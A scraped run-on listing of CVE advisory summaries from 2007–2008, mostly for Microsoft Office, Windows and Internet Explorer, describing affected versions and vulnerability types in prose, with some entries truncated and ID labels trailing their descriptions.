Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a crafted .DXF file, aka "Visio Memory Validation Vulnerability." [CVE-2008-1089] Unspecified vulnerability in Microsoft Visio 2002 SP2, 2003 SP2 and SP3, and 2007 up to SP1 allows user-assisted remote attackers to execute arbitrary code via a Visio file containing crafted object header data, aka "Visio Object Header Vulnerability." [CVE-2008-1088] Microsoft Project 2000 Service Release 1, 2002 SP1, and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a crafted Project file, related to improper validation of "memory resource allocations." [CVE-2008-1087] Stack-based buffer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF image file with crafted filename parameters, aka "GDI Stack Overflow Vulnerability." [CVE-2008-1086] The HxTocCtrl ActiveX control (hxvz.dll), as used in Microsoft Internet Explorer 5.01 SP4 and 6 SP1, in Windows XP SP2, Server 2003 SP1 and SP2, Vista SP1, and Server 2008, allows remote attackers to execute arbitrary code via malformed arguments, which triggers memory corruption. [CVE-2008-1084] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, through Vista SP1, and Server 2008 allows local users to execute arbitrary code via unknown vectors related to improper input validation. NOTE: it was later reported that one affected function is NtUserFnOUTSTRING in win32k.sys. [CVE-2008-1083] Heap-based buffer overflow in the CreateDIBPatternBrushPt function in GDI in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, and Server 2008 allows remote attackers to execute arbitrary code via an EMF or WMF image file with a malformed header that triggers an integer overflow, aka "GDI Heap Overflow Vulnerability." [CVE-2008-0121] A "memory calculation error" in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with an invalid picture index that triggers memory corruption, aka "Memory Calculation Vulnerability." [CVE-2008-0120] Integer overflow in Microsoft PowerPoint Viewer 2003 allows remote attackers to execute arbitrary code via a PowerPoint file with a malformed picture index that triggers memory corruption, related to handling of CString objects, aka "Memory Allocation Vulnerability." [CVE-2008-0119] Unspecified vulnerability in Microsoft Publisher in Office 2000 and XP SP3, 2003 SP2 and SP3, and 2007 SP1 and earlier allows remote attackers to execute arbitrary code via a Publisher file with crafted object header data that triggers memory corruption, aka "Publisher Object Handler Validation Vulnerability." [CVE-2008-0118] Unspecified vulnerability in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, Excel Viewer 2003 up to SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption from an "allocation error," aka "Microsoft Office Memory Corruption Vulnerability." [CVE-2008-0117] Unspecified vulnerability in Microsoft Excel 2000 SP3 and 2002 SP2, and Office 2004 and 2008 for Mac, allows user-assisted remote attackers to execute arbitrary code via crafted conditional formatting values, aka "Excel Conditional Formatting Vulnerability." [CVE-2008-0116] Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, Compatibility Pack, and Office 2004 and 2008 for Mac allows user-assisted remote attackers to execute arbitrary code via malformed tags in rich text, aka "Excel Rich Text Validation Vulnerability." [CVE-2008-0115] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via malformed formulas, aka "Excel Formula Parsing Vulnerability." [CVE-2008-0114] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office for Mac 2004 allows user-assisted remote attackers to execute arbitrary code via crafted Style records that trigger memory corruption. [CVE-2008-0113] Unspecified vulnerability in Microsoft Office Excel Viewer 2003 up to SP3 allows user-assisted remote attackers to execute arbitrary code via an Excel document with malformed cell comments that trigger memory corruption from an "allocation error," aka "Microsoft Office Cell Parsing Memory Corruption Vulnerability." [CVE-2008-0112] Unspecified vulnerability in Microsoft Excel 2000 SP3, and Office for Mac 2004 and 2008 allows user-assisted remote attackers to execute arbitrary code via a crafted .SLK file that is not properly handled when importing the file, aka "Excel File Import Vulnerability." [CVE-2008-0111] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2007, Viewer 2003, Compatibility Pack, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted data validation records, aka "Excel Data Validation Record Vulnerability." [CVE-2008-0110] Unspecified vulnerability in Microsoft Outlook in Office 2000 SP3, XP SP3, 2003 SP2 and Sp3, and Office System allows user-assisted remote attackers to execute arbitrary code via a crafted mailto URI. [CVE-2008-0109] Word in Microsoft Office 2000 SP3, XP SP3, Office 2003 SP2, and Office Word Viewer 2003 allows remote attackers to execute arbitrary code via crafted fields within the File Information Block (FIB) of a Word file, which triggers length calculation errors and memory corruption. [CVE-2008-0108] Stack-based buffer overflow in wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted field lengths, aka "Microsoft Works File Converter Field Length Vulnerability." [CVE-2008-0106] Buffer overflow in Microsoft SQL Server 2005 SP1 and SP2, and 2005 Express Edition SP1 and SP2, allows remote authenticated users to execute arbitrary code via a crafted insert statement. [CVE-2008-0105] Microsoft Works 6 File Converter, as used in Office 2003 SP2 and SP3, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section header index table information, aka "Microsoft Works File Converter Index Table Vulnerability." [CVE-2008-0104] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, aka "Publisher Memory Corruption Vulnerability." [CVE-2008-0103] Unspecified vulnerability in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Office document that contains a malformed object, related to a "memory handling error," aka "Microsoft Office Execution Jump Vulnerability." [CVE-2008-0102] Unspecified vulnerability in Microsoft Office Publisher 2000, 2002, and 2003 SP2 allows remote attackers to execute arbitrary code via a crafted .pub file, related to invalid "memory values," aka "Publisher Invalid Memory Reference Vulnerability." [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0086] Buffer overflow in the convert function in Microsoft SQL Server 2000 SP4, 2000 Desktop Engine (MSDE 2000) SP4, and 2000 Desktop Engine (WMSDE) allows remote authenticated users to execute arbitrary code via a crafted SQL expression. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0081] Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted macros, aka "Macro Validation Vulnerability," a different vulnerability than CVE-2007-3490. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2008-0011] Microsoft DirectX 8.1 through 9.0c, and DirectX on Microsoft XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, does not properly perform MJPEG error checking, which allows remote attackers to execute arbitrary code via a crafted MJPEG stream in a (1) AVI or (2) ASF file, aka the "MJPEG Decoder Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6357] Stack-based buffer overflow in Microsoft Office Access allows remote, user-assisted attackers to execute arbitrary code via a crafted Microsoft Access Database (.mdb) file. NOTE: due to the lack of details as of 20071210, it is not clear whether this issue is the same as CVE-2007-6026 or CVE-2005-0944. [CVE-2007-6329] Microsoft Office 2007 12.0.6015.5000 and MSO 12.0.6017.5000 do not sign the metadata of Office Open XML (OOXML) documents, which makes it easier for remote attackers to modify Dublin Core metadata fields, as demonstrated by the (1) LastModifiedBy and (2) creator fields in docProps/core.xml in the OOXML ZIP container. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-6026] Stack-based buffer overflow in Microsoft msjet40.dll 4.0.8618.0 (aka Microsoft Jet Engine), as used by Access 2003 in Microsoft Office 2003 SP3, allows user-assisted attackers to execute arbitrary code via a crafted MDB file database file containing a column structure with a modified column count. NOTE: this might be the same issue as CVE-2005-0944. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-4991] The SOCKS4 Proxy in Microsoft Internet Security and Acceleration (ISA) Server 2004 SP1 and SP2 allows remote attackers to obtain potentially sensitive information (the destination IP address of another user's session) via an empty packet. [CVE-2007-4916] Heap-based buffer overflow in the FileFind::FindFile method in (1) MFC42.dll, (2) MFC42u.dll, (3) MFC71.dll, and (4) MFC71u.dll in Microsoft Foundation Class (MFC) Library 8.0, as used by the ListFiles method in hpqutil.dll 2.0.0.138 in Hewlett-Packard (HP) All-in-One and Photo & Imaging Gallery 1.1 and probably other products, allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long first argument. [CVE-2007-4814] Buffer overflow in the SQLServer ActiveX control in the Distributed Management Objects OLE DLL (sqldmo.dll) 2000.085.2004.00 in Microsoft SQL Server Enterprise Manager 8.05.2004 allows remote attackers to execute arbitrary code via a long second argument to the Start method. [CVE-2007-3930] Interpretation conflict between Microsoft Internet Explorer and DocuWiki before 2007-06-26b allows remote attackers to inject arbitrary JavaScript and conduct cross-site scripting (XSS) attacks when spellchecking UTF-8 encoded messages via the spell_utf8test function in lib/exe/spellcheck.php, which triggers HTML document identification and script execution by Internet Explorer even though the Content-Type header is text/plain. [CVE-2007-3924] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Netscape installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a -chrome argument to the navigatorurl URI, which are inserted into the command line that is created when invoking netscape.exe, a related issue to CVE-2007-3670. NOTE: there has been debate about whether the issue is in Internet Explorer or Netscape. As of 20070713, it is CVE's opinion that IE appears to not properly delimit the URL argument when invoking Netscape [CVE-2007-3899] Unspecified vulnerability in Microsoft Word 2000 SP3, Word 2002 SP3, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string in a Word file, aka "Word Memory Corruption Vulnerability." [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3890] Microsoft Excel in Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a Workspace with a certain index value that triggers memory corruption. [CVE-2007-3670] Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data." [CVE-2007-3490] Unspecified vulnerability in Microsoft Excel 2003 SP2 allows remote attackers to have an unknown impact via unspecified vectors, possibly related to the sheet name, as demonstrated by 2670.xls. [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3039] Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server. [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file involving the "denoting [of] the start of a Workspace designation", which results in memory corruption, aka the "Workbook Memory Corruption Vulnerability". [CVE-2007-3029] Unspecified vulnerability in Microsoft Excel 2002 SP3 and 2003 SP2 allows user-assisted remote attackers to execute arbitrary code via a malformed Excel file containing multiple active worksheets, which results in memory corruption. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2903] Buffer overflow in the HelpPopup method in the Microsoft Office 2000 Controllo UA di Microsoft Office ActiveX control (OUACTRL.OCX) 1.0.1.9 allows remote attackers to cause a denial of service (probably winhlp32.exe crash) via a long first argument. NOTE: it is not clear whether this issue crosses privilege boundaries. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1911] Multiple unspecified vulnerabilities in Microsoft Word 2007 allow remote attackers to cause a denial of service (CPU consumption) via crafted documents, as demonstrated by (1) file798-1.doc and (2) file613-1.doc, possibly related to a buffer overflow. [CVE-2007-1910] Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document, as demonstrated by file789-1.doc. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1756] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and Office Excel 2007 does not properly validate version information, which allows user-assisted remote attackers to execute arbitrary code via a crafted Excel file, aka "Calculation Error Vulnerability". [CVE-2007-1754] PUBCONV.DLL in Microsoft Office Publisher 2007 does not properly clear memory when transferring data from disk to memory, which allows user-assisted remote attackers to execute arbitrary code via a malformed .pub page via a certain negative value, which bypasses a sanitization procedure that initializes critical pointers to NULL, aka the "Publisher Invalid Memory Reference Vulnerability". [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-1747] Unspecified vulnerability in MSO.dll in Microsoft Office 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a malformed drawing object, which triggers memory corruption. [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1239] Microsoft Excel 2003 does not properly parse .XLS files, which allows remote attackers to cause a denial of service (application crash) via a file with a (1) corrupted XML format or a (2) corrupted XLS format, which triggers a NULL pointer dereference. [CVE-2007-1238] Microsoft Office 2003 allows user-assisted remote attackers to cause a denial of service (application crash) by attempting to insert a corrupted WMF file. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1214] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted AutoFilter filter record in an Excel BIFF8 format XLS file, which triggers memory corruption. [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1203] Unspecified vulnerability in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a crafted set font value in an Excel file, which results in memory corruption. [CVE-2007-1202] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly parse certain rich text "property strings of certain control words," which allows user-assisted remote attackers to trigger heap corruption and execute arbitrary code, aka the "Word RTF Parsing Vulnerability." [CVE-2007-1201] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via vectors related to DataSource that trigger memory corruption, aka "Office Web Components DataSource Vulnerability." [CVE-2007-1117] Unspecified vulnerability in Publisher 2007 in Microsoft Office 2007 allows remote attackers to execute arbitrary code via unspecified vectors, related to a "file format vulnerability." NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-1083] Buffer overflow in the Configuration Checker (ConfigChk) ActiveX control in VSCnfChk.dll 2.0.0.2 for Verisign Managed PKI Service, Secure Messaging for Microsoft Exchange, and Go Secure! allows remote attackers to execute arbitrary code via long arguments to the VerCompare method. [CVE-2007-0948] Heap-based buffer overflow in Microsoft Virtual PC 2004 and PC for Mac 7.1 and 7, and Virtual Server 2005 and 2005 R2, allows local guest OS administrators to execute arbitrary code on the host OS via unspecified vectors related to "interaction and initialization of components." [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0940] Unspecified vulnerability in the Cryptographic API Component Object Model Certificates ActiveX control (CAPICOM.dll) in Microsoft CAPICOM and BizTalk Server 2004 SP1 and SP2 allows remote attackers to execute arbitrary code via unspecified vectors, aka the "CAPICOM.Certificates Vulnerability." [CVE-2007-0939] Cross-site scripting (XSS) vulnerability in Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving HTML redirection queries, aka "Cross-site Scripting and Spoofing Vulnerability." [CVE-2007-0938] Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 does not properly handle certain characters in a crafted HTTP GET request, which allows remote attackers to execute arbitrary code, aka the "CMS Memory Corruption Vulnerability." [CVE-2007-0936] Multiple unspecified vulnerabilities in Microsoft Visio 2002 allow remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted packed object that triggers memory corruption, aka "Visio Document Packaging Vulnerability." [CVE-2007-0934] Unspecified vulnerability in Microsoft Visio 2002 allows remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted version number that triggers memory corruption. [CVE-2007-0913] Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as exploited by Trojan.PPDropper.G. NOTE: as of 20070213, it is not clear whether this is the same issue as CVE-2006-5296, CVE-2006-4694, CVE-2006-3876, CVE-2006-3877, or older issues. [CVE-2007-0870] Unspecified vulnerability in Microsoft Word 2000 allows remote attackers to cause a denial of service (crash) via unknown vectors, a different vulnerability than CVE-2006-5994, CVE-2006-6456, CVE-2006-6561, and CVE-2007-0515, a variant of Exploit-MS06-027. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0671] Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0515] 